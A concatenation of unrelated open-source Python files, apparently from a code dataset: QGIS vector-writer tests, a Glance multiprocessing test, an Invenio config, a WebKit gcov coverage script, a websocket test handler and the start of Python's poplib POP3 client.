f = next(created_layer.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['field1'], 11)
self.assertEqual(f['field3'], 13)
# finally test writing no attributes
dest_file_name = os.path.join(str(QDir.tempPath()), 'no_attributes.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
skipAttributeCreation=True)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
# expect only a default 'FID' field for shapefiles
self.assertEqual(created_layer.fields().count(), 1)
self.assertEqual(created_layer.fields()[0].name(), 'FID')
# in this case we also check that the geometry exists, to make sure feature has been correctly written
# even without attributes
f = next(created_layer.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
expWkt = 'Point (1 2)'
self.assertTrue(compareWkt(expWkt, wkt),
"geometry not saved correctly when saving without attributes : mismatch Expected:\n%s\nGot:\n%s\n" % (
expWkt, wkt))
self.assertEqual(f['FID'], 0)
def testValueConverter(self):
"""Tests writing a layer with a field value converter."""
ml = QgsVectorLayer(
('Point?field=nonconv:int&field=ignored:string&field=converted:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
self.assertEqual(ml.fields().count(), 3)
ft = QgsFeature()
ft.setAttributes([1, 'ignored', 3])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'value_converter.shp')
converter = TestFieldValueConverter(ml)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
QgsCoordinateReferenceSystem(),
'ESRI Shapefile',
attributes=[0, 2],
fieldValueConverter=converter)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
self.assertEqual(created_layer.fields().count(), 2)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['nonconv'], 1)
self.assertEqual(f['conv_attr'], 'converted_val')
def testInteger64WriteTabfile(self):
"""Check writing Integer64 fields to an MapInfo tabfile (which does not support that type)."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=int8:int8'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setAttributes([2123456789])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'integer64.tab')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'MapInfo File')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
fields = created_layer.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName('int8')).type(), QVariant.Double)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
int8_idx = created_layer.fields().lookupField('int8')
self.assertEqual(f.attributes()[int8_idx], 2123456789)
def testDefaultDatasetOptions(self):
""" Test retrieving default dataset options for a format """
# NOTE - feel free to adapt these if the defaults change!
options = QgsVectorFileWriter.defaultDatasetOptions('not a format')
self.assertEqual(options, [])
options = QgsVectorFileWriter.defaultDatasetOptions('ESRI Shapefile')
self.assertEqual(options, [])
options = QgsVectorFileWriter.defaultDatasetOptions('GML')
# just test a few
self.assertTrue('GML3_LONGSRS=YES' in options)
self.assertTrue('STRIP_PREFIX=NO' in options)
def testDefaultLayerOptions(self):
""" Test retrieving default layer options for a format """
# NOTE - feel free to adapt these if the defaults change!
options = QgsVectorFileWriter.defaultLayerOptions('not a format')
self.assertEqual(options, [])
options = QgsVectorFileWriter.defaultLayerOptions('ESRI Shapefile')
self.assertEqual(options, ['RESIZE=NO'])
options = QgsVectorFileWriter.defaultLayerOptions('GML')
self.assertEqual(options, [])
def testOverwriteLayer(self):
"""Tests writing a layer with a field value converter."""
ml = QgsVectorLayer('Point?field=firstfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([1])
provider.addFeatures([ft])
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename, update=1)
lyr = ds.GetLayerByName('test')
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 1)
ds.CreateLayer('another_layer')
del f
del lyr
del ds
caps = QgsVectorFileWriter.editionCapabilities(filename)
self.assertTrue((caps & QgsVectorFileWriter.CanAddNewLayer))
self.assertTrue((caps & QgsVectorFileWriter.CanAppendToExistingLayer))
self.assertTrue((caps & QgsVectorFileWriter.CanAddNewFieldsToExistingLayer))
self.assertTrue((caps & QgsVectorFileWriter.CanDeleteLayer))
self.assertTrue(QgsVectorFileWriter.targetLayerExists(filename, 'test'))
self.assertFalse(QgsVectorFileWriter.areThereNewFieldsToCreate(filename, 'test', ml, [0]))
# Test CreateOrOverwriteLayer
ml = QgsVectorLayer('Point?field=firstfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([2])
provider.addFeatures([ft])
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
options.actionOnExistingFile = QgsVectorFileWriter.CreateOrOverwriteLayer
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 2)
# another_layer should still exist
self.assertIsNotNone(ds.GetLayerByName('another_layer'))
del f
del lyr
del ds
# Test CreateOrOverwriteFile
ml = QgsVectorLayer('Point?field=firstfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([3])
provider.addFeatures([ft])
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 3)
# another_layer should no longer exist
self.assertIsNone(ds.GetLayerByName('another_layer'))
del f
del lyr
del ds
# Test AppendToLayerNoNewFields
ml = QgsVectorLayer('Point?field=firstfield:int&field=secondfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([4, -10])
provider.addFeatures([ft])
self.assertTrue(QgsVectorFileWriter.areThereNewFieldsToCreate(filename, 'test', ml, [0, 1]))
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
options.actionOnExistingFile = QgsVectorFileWriter.AppendToLayerNoNewFields
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 1)
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 3)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 4)
del f
del lyr
del ds
# Test AppendToLayerAddFields
ml = QgsVectorLayer('Point?field=firstfield:int&field=secondfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([5, -1])
provider.addFeatures([ft])
self.assertTrue(QgsVectorFileWriter.areThereNewFieldsToCreate(filename, 'test', ml, [0, 1]))
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
options.actionOnExistingFile = QgsVectorFileWriter.AppendToLayerAddFields
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 2)
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 3)
if hasattr(f, "IsFieldSetAndNotNull"):
# GDAL >= 2.2
self.assertFalse(f.IsFieldSetAndNotNull('secondfield'))
else:
self.assertFalse(f.IsFieldSet('secondfield'))
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 4)
if hasattr(f, "IsFieldSetAndNotNull"):
self.assertFalse(f.IsFieldSetAndNotNull('secondfield'))
else:
self.assertFalse(f.IsFieldSet('secondfield'))
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 5)
self.assertEqual(f['secondfield'], -1)
del f
del lyr
del ds
gdal.Unlink(filename)
def testSupportedFiltersAndFormat(self):
# test with formats in recommended order
formats = QgsVectorFileWriter.supportedFiltersAndFormats(QgsVectorFileWriter.SortRecommended)
self.assertEqual(formats[0].filterString, 'GeoPackage (*.gpkg *.GPKG)')
self.assertEqual(formats[0].driverName, 'GPKG')
self.assertEqual(formats[1].filterString, 'ESRI Shapefile (*.shp *.SHP)')
self.assertEqual(formats[1].driverName, 'ESRI Shapefile')
self.assertTrue('ODS' in [f.driverName for f in formats])
# alphabetical sorting
formats2 = QgsVectorFileWriter.supportedFiltersAndFormats(QgsVectorFileWriter.VectorFormatOptions())
self.assertTrue(formats2[0].driverName < formats2[1].driverName)
self.assertCountEqual([f.driverName for f in formats], [f.driverName for f in formats2])
self.assertNotEqual(formats2[0].driverName, 'GeoPackage')
# skip non-spatial
formats = QgsVectorFileWriter.supportedFiltersAndFormats(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ODS' in [f.driverName for f in formats])
def testOgrDriverList(self):
# test with drivers in recommended order
drivers = QgsVectorFileWriter.ogrDriverList(QgsVectorFileWriter.SortRecommended)
self.assertEqual(drivers[0].longName, 'GeoPackage')
self.assertEqual(drivers[0].driverName, 'GPKG')
self.assertEqual(drivers[1].longName, 'ESRI Shapefile')
self.assertEqual(drivers[1].driverName, 'ESRI Shapefile')
self.assertTrue('ODS' in [f.driverName for f in drivers])
# alphabetical sorting
drivers2 = QgsVectorFileWriter.ogrDriverList(QgsVectorFileWriter.VectorFormatOptions())
self.assertTrue(drivers2[0].longName < drivers2[1].longName)
self.assertCountEqual([d.driverName for d in drivers], [d.driverName for d in drivers2])
self.assertNotEqual(drivers2[0].driverName, 'GPKG')
# skip non-spatial
formats = QgsVectorFileWriter.ogrDriverList(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ODS' in [f.driverName for f in formats])
def testSupportedFormatExtensions(self):
formats = QgsVectorFileWriter.supportedFormatExtensions()
self.assertTrue('gpkg' in formats)
self.assertFalse('exe' in formats)
self.assertEqual(formats[0], 'gpkg')
self.assertEqual(formats[1], 'shp')
self.assertTrue('ods' in formats)
# alphabetical sorting
formats2 = QgsVectorFileWriter.supportedFormatExtensions(QgsVectorFileWriter.VectorFormatOptions())
self.assertTrue(formats2[0] < formats2[1])
self.assertCountEqual(formats, formats2)
self.assertNotEqual(formats2[0], 'gpkg')
formats = QgsVectorFileWriter.supportedFormatExtensions(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ods' in formats)
def testFileFilterString(self):
formats = QgsVectorFileWriter.fileFilterString()
self.assertTrue('gpkg' in formats)
self.assertTrue('shp' in formats)
self.assertTrue(formats.index('gpkg') < formats.index('shp'))
self.assertTrue('ods' in formats)
# alphabetical sorting
formats2 = QgsVectorFileWriter.fileFilterString(QgsVectorFileWriter.VectorFormatOptions())
self.assertNotEqual(formats.index('gpkg'), formats2.index('gpkg'))
# hide non spatial
formats = QgsVectorFileWriter.fileFilterString(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ods' in formats)
def testDriverForExtension(self):
self.assertEqual(QgsVectorFileWriter.driverForExtension('shp'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('SHP'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('sHp'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('.shp'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('tab'), 'MapInfo File')
self.assertEqual(QgsVectorFileWriter.driverForExtension('.GML'), 'GML')
self.assertEqual(QgsVectorFileWriter.driverForExtension('not a format'), '')
self.assertEqual(QgsVectorFileWriter.driverForExtension(''), '')
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
saeki-masaki/glance | glance/tests/functional/v1/test_multiprocessing.py | 10 | 2590 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import httplib2
import psutil
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
from glance.tests import functional
from glance.tests.utils import execute
class TestMultiprocessing(functional.FunctionalTest):
"""Functional tests for the bin/glance CLI tool"""
def setUp(self):
self.workers = 2
super(TestMultiprocessing, self).setUp()
def test_multiprocessing(self):
"""Spin up the api servers with multiprocessing on"""
self.cleanup()
self.start_servers(**self.__dict__.copy())
path = "http://%s:%d/v1/images" % ("127.0.0.1", self.api_port)
http = httplib2.Http()
response, content = http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"images": []}', content)
self.stop_servers()
def _get_children(self):
api_pid = self.api_server.process_pid
process = psutil.Process(api_pid)
children = process.get_children()
pids = [str(child.pid) for child in children]
return pids
def test_interrupt_avoids_respawn_storm(self):
"""
Ensure an interrupt signal does not cause a respawn storm.
See bug #978130
"""
self.start_servers(**self.__dict__.copy())
children = self._get_children()
cmd = "kill -INT %s" % ' '.join(children)
execute(cmd, raise_error=True)
for _ in range(9):
# NOTE: this wait is timing-sensitive; a 0.05s sleep fails randomly,
# while 0.10s has been reliable in practice
time.sleep(0.10)
# ensure number of children hasn't grown
self.assertTrue(len(children) >= len(self._get_children()))
for child in self._get_children():
# ensure no new children spawned
self.assertIn(child, children, child)
self.stop_servers()
| apache-2.0 |
JohnGeorgiadis/invenio | invenio/utils/plotextractor/config.py | 7 | 1089 | # -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2010, 2011, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
# pylint: disable=C0301
"""Plotextractor configuration."""
from __future__ import unicode_literals
__revision__ = "$Id$"
# CFG_PLOTEXTRACTOR_DESY_BASE --
CFG_PLOTEXTRACTOR_DESY_BASE = 'http://www-library.desy.de/preparch/desy/'
# CFG_PLOTEXTRACTOR_DESY_PIECE --
CFG_PLOTEXTRACTOR_DESY_PIECE = '/desy'
| gpl-2.0 |
sloanyang/android_external_webkit | Tools/CodeCoverage/cov.py | 27 | 7773 | # Copyright (C) 2004, 2005, 2006 Nathaniel Smith
# Copyright (C) 2006, 2007 Holger Hans Peter Freyther
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Apple Computer, Inc. ("Apple") nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY APPLE AND ITS CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import csv
import time
import os.path
import shutil
def analyze_coverage(possible_gcov_files, source_files, runid, data_dir, base):
if not os.path.exists(data_dir):
os.makedirs(data_dir)
output = open(os.path.join(data_dir, runid + ".csv"), "w")
w = csv.writer(output)
# First row: id and time
w.writerow([runid, time.time()])
results = scan_gcov_files(possible_gcov_files, source_files)
annotated_dir = os.path.join(data_dir, runid + ".annotated")
if os.path.exists(annotated_dir):
shutil.rmtree(annotated_dir)
keys = results.keys()
keys.sort()
for path in keys:
(total, covered, annotated_data) = results[path]
path = path[path.find(base)+len(base):]
# Rest of the rows: filename, total_lines, covered_lines
w.writerow([path, total, covered])
if path[:1] == "/":
path = path[1:]
annotated_path = os.path.join(annotated_dir, path)
try:
os.makedirs(os.path.dirname(annotated_path))
except OSError:
pass
a = open(annotated_path, "w")
a.write(annotated_data)
a.close()
# zecke's rewrite
STATE_NOT_CODE = -1
STATE_NOT_SEEN = -2
STATE_TEST_CODE = -3
def find_gcov(f, possible_gcovs):
"""
Find .gcov files that could be of interest for us
"""
try:
return possible_gcovs[f]
except:
return []
def parse_source_file(file):
"""
Parse one source file and return a list of lines
"""
f_source_list = []
init_state = STATE_NOT_SEEN
in_test_code = False
nesting = 0
for line in open(file, "r"):
code = line.split(":", 2)[-1]
if not in_test_code and code.startswith("#ifdef BUILD_UNIT_TESTS"):
in_test_code = 1
if in_test_code and code.startswith("#if"):
nesting += 1
if in_test_code and code.startswith("#endif"):
nesting -= 1
if not nesting:
                in_test_code = False
if in_test_code:
init_state = STATE_TEST_CODE
else:
init_state = STATE_NOT_SEEN
f_source_list.append([init_state, line.split(":", 1)[1]])
return f_source_list
# Runner-up, 3rd annual "write Python that looks like Perl" competition,
# Well, not really. It doesn't even use regexps.
# He is right so I'm cleaning it up (zecke)
def scan_gcov_files(possible_gcov_files, source_files):
"""Takes a list of gcov filenames and a list of source filenames.
The gcov files should have names of the form foo.o##foo.cc.gcov, as
created by 'gcov -l'.
Returns a dict mapping source filenames to tuples
(total_lines, tested_lines, gcov_annotated_source)
which are a number, a number, and a very long string, respectively.
The fun bit is that we merge .gcov output generated by different object
files; this way we can provide accurate information for header files and
for monotone's current unit test system."""
results = {}
for f in source_files:
possible_gcovs = find_gcov(f, possible_gcov_files)
base_name = os.path.splitext(os.path.basename(f))[0]
if len(possible_gcovs) == 0:
print "No gcov files found for: '%s' but it was compiled" % f
continue
(garbage,extension) = os.path.splitext(f)
if extension in [".cc", ".c", ".moc", ".cpp", ".cxx", ".m", ".mm"]:
lines = open(f, "r").readlines()
results[f] = (len(lines), 0, "".join(lines))
continue
elif len(possible_gcovs) > 1:
print "More than one gcov file for %s %d" % (f,len(possible_gcovs))
base_gcov_lines = parse_source_file(possible_gcovs[0])
# Now we will try hard to merge the results with others
# Our requirement is that we have the same amount of lines as
# as the original file
for cov_file in possible_gcovs:
lines = open(cov_file, "r").readlines()
            # e.g. with phonon we have visualisation.h and we cannot know
            # which header file (foldername) it is referring to. This is a gcov
            # limitation and I have no workaround yet. We just hope we will pick
            # the right header file...
if len(lines) != len(base_gcov_lines):
print "Error Base: %s and Target: %s have different amount of lines" % (possible_gcovs[0],cov_file)
continue
# now do the merging of the file. If it has the same basename
# and the same number of lines things might work out
# In the future take a look at the header of the file
i = 0
for line in lines:
accumulator = base_gcov_lines[i]
if accumulator[0] != STATE_TEST_CODE:
info = line.split(":", 1)[0]
if info.endswith("-"):
if accumulator[0] == STATE_NOT_SEEN:
accumulator[0] = STATE_NOT_CODE
else:
if info.endswith("#"):
num = 0
else:
num = int(info)
if accumulator[0] in (STATE_NOT_SEEN, STATE_NOT_CODE):
accumulator[0] = 0
accumulator[0] += num
i += 1
        # post processing of this file
(total_lines, total_covered) = (0, 0)
annotated_lines = []
for state, line in base_gcov_lines:
if state == STATE_NOT_SEEN:
desc = "?????"
elif state == STATE_TEST_CODE:
desc = "+"
elif state == STATE_NOT_CODE:
desc = "-"
elif state == 0:
desc = "#####"
total_lines += 1
else:
desc = str(state)
total_lines += 1
total_covered += 1
annotated_lines.append(":".join([desc.rjust(9), line]))
results[f] = (total_lines, total_covered, "".join(annotated_lines))
    return results
| gpl-2.0 |
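As a side note to the entry above: the count field that parse_source_file() and scan_gcov_files() read from 'gcov -l' output is the text before the first colon of each annotated line. The sketch below is an illustrative restatement of that convention, not code from the WebKit tool, and the sample lines are invented.
def gcov_line_count(annotated_line):
    """Return the execution count encoded in a gcov-annotated line,
    0 for executable-but-unexecuted lines and None for non-code lines."""
    info = annotated_line.split(":", 1)[0].strip()
    if info.endswith("-"):
        return None
    if info.endswith("#"):
        return 0
    return int(info)

assert gcov_line_count("        -:   10:// comment") is None
assert gcov_line_count("    #####:   11:    foo();") == 0
assert gcov_line_count("        3:   12:    bar();") == 3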
wuhengzhi/chromium-crosswalk | third_party/WebKit/LayoutTests/http/tests/websocket/simple_wsh.py | 42 | 1741 | # Copyright (C) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from mod_pywebsocket import msgutil
def web_socket_do_extra_handshake(request):
pass # Always accept.
def web_socket_transfer_data(request):
msgutil.send_message(request, 'Hello from Simple WSH.')
| bsd-3-clause |
lache/RacingKingLee | monitor/engine.win64/2.74/python/lib/poplib.py | 74 | 14327 | """A POP3 client class.
Based on the J. Myers POP3 draft, Jan. 96
"""
# Author: David Ascher <david_ascher@brown.edu>
# [heavily stealing from nntplib.py]
# Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97]
# String method conversion and test jig improvements by ESR, February 2001.
# Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003
# Example (see the test function at the end of this file)
# Imports
import errno
import re
import socket
try:
import ssl
HAVE_SSL = True
except ImportError:
HAVE_SSL = False
__all__ = ["POP3","error_proto"]
# Exception raised when an error or invalid response is received:
class error_proto(Exception): pass
# Standard Port
POP3_PORT = 110
# POP SSL PORT
POP3_SSL_PORT = 995
# Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF)
CR = b'\r'
LF = b'\n'
CRLF = CR+LF
# maximal line length when calling readline(). This is to prevent
# reading arbitrary length lines. RFC 1939 limits POP3 line length to
# 512 characters, including CRLF. We have selected 2048 just to be on
# the safe side.
_MAXLINE = 2048
class POP3:
"""This class supports both the minimal and optional command sets.
Arguments can be strings or integers (where appropriate)
    (e.g.: retr(1) and retr('1') both work equally well.)
Minimal Command Set:
USER name user(name)
PASS string pass_(string)
STAT stat()
LIST [msg] list(msg = None)
RETR msg retr(msg)
DELE msg dele(msg)
NOOP noop()
RSET rset()
QUIT quit()
Optional Commands (some servers support these):
RPOP name rpop(name)
APOP name digest apop(name, digest)
TOP msg n top(msg, n)
UIDL [msg] uidl(msg = None)
CAPA capa()
STLS stls()
Raises one exception: 'error_proto'.
Instantiate with:
POP3(hostname, port=110)
NB: the POP protocol locks the mailbox from user
authorization until QUIT, so be sure to get in, suck
the messages, and quit, each time you access the
mailbox.
POP is a line-based protocol, which means large mail
messages consume lots of python cycles reading them
line-by-line.
If it's available on your mail server, use IMAP4
instead, it doesn't suffer from the two problems
above.
"""
encoding = 'UTF-8'
def __init__(self, host, port=POP3_PORT,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.host = host
self.port = port
self._tls_established = False
self.sock = self._create_socket(timeout)
self.file = self.sock.makefile('rb')
self._debugging = 0
self.welcome = self._getresp()
def _create_socket(self, timeout):
return socket.create_connection((self.host, self.port), timeout)
def _putline(self, line):
if self._debugging > 1: print('*put*', repr(line))
self.sock.sendall(line + CRLF)
# Internal: send one command to the server (through _putline())
def _putcmd(self, line):
if self._debugging: print('*cmd*', repr(line))
line = bytes(line, self.encoding)
self._putline(line)
# Internal: return one line from the server, stripping CRLF.
# This is where all the CPU time of this module is consumed.
# Raise error_proto('-ERR EOF') if the connection is closed.
def _getline(self):
line = self.file.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise error_proto('line too long')
if self._debugging > 1: print('*get*', repr(line))
if not line: raise error_proto('-ERR EOF')
octets = len(line)
# server can send any combination of CR & LF
# however, 'readline()' returns lines ending in LF
# so only possibilities are ...LF, ...CRLF, CR...LF
if line[-2:] == CRLF:
return line[:-2], octets
if line[0] == CR:
return line[1:-1], octets
return line[:-1], octets
# Internal: get a response from the server.
# Raise 'error_proto' if the response doesn't start with '+'.
def _getresp(self):
resp, o = self._getline()
if self._debugging > 1: print('*resp*', repr(resp))
if not resp.startswith(b'+'):
raise error_proto(resp)
return resp
# Internal: get a response plus following text from the server.
def _getlongresp(self):
resp = self._getresp()
list = []; octets = 0
line, o = self._getline()
while line != b'.':
if line.startswith(b'..'):
o = o-1
line = line[1:]
octets = octets + o
list.append(line)
line, o = self._getline()
return resp, list, octets
# Internal: send a command and get the response
def _shortcmd(self, line):
self._putcmd(line)
return self._getresp()
# Internal: send a command and get the response plus following text
def _longcmd(self, line):
self._putcmd(line)
return self._getlongresp()
# These can be useful:
def getwelcome(self):
return self.welcome
def set_debuglevel(self, level):
self._debugging = level
# Here are all the POP commands:
def user(self, user):
"""Send user name, return response
(should indicate password required).
"""
return self._shortcmd('USER %s' % user)
def pass_(self, pswd):
"""Send password, return response
(response includes message count, mailbox size).
NB: mailbox is locked by server from here to 'quit()'
"""
return self._shortcmd('PASS %s' % pswd)
def stat(self):
"""Get mailbox status.
Result is tuple of 2 ints (message count, mailbox size)
"""
retval = self._shortcmd('STAT')
rets = retval.split()
if self._debugging: print('*stat*', repr(rets))
numMessages = int(rets[1])
sizeMessages = int(rets[2])
return (numMessages, sizeMessages)
def list(self, which=None):
"""Request listing, return result.
Result without a message number argument is in form
['response', ['mesg_num octets', ...], octets].
Result when a message number argument is given is a
single response: the "scan listing" for that message.
"""
if which is not None:
return self._shortcmd('LIST %s' % which)
return self._longcmd('LIST')
def retr(self, which):
"""Retrieve whole message number 'which'.
Result is in form ['response', ['line', ...], octets].
"""
return self._longcmd('RETR %s' % which)
def dele(self, which):
"""Delete message number 'which'.
Result is 'response'.
"""
return self._shortcmd('DELE %s' % which)
def noop(self):
"""Does nothing.
One supposes the response indicates the server is alive.
"""
return self._shortcmd('NOOP')
def rset(self):
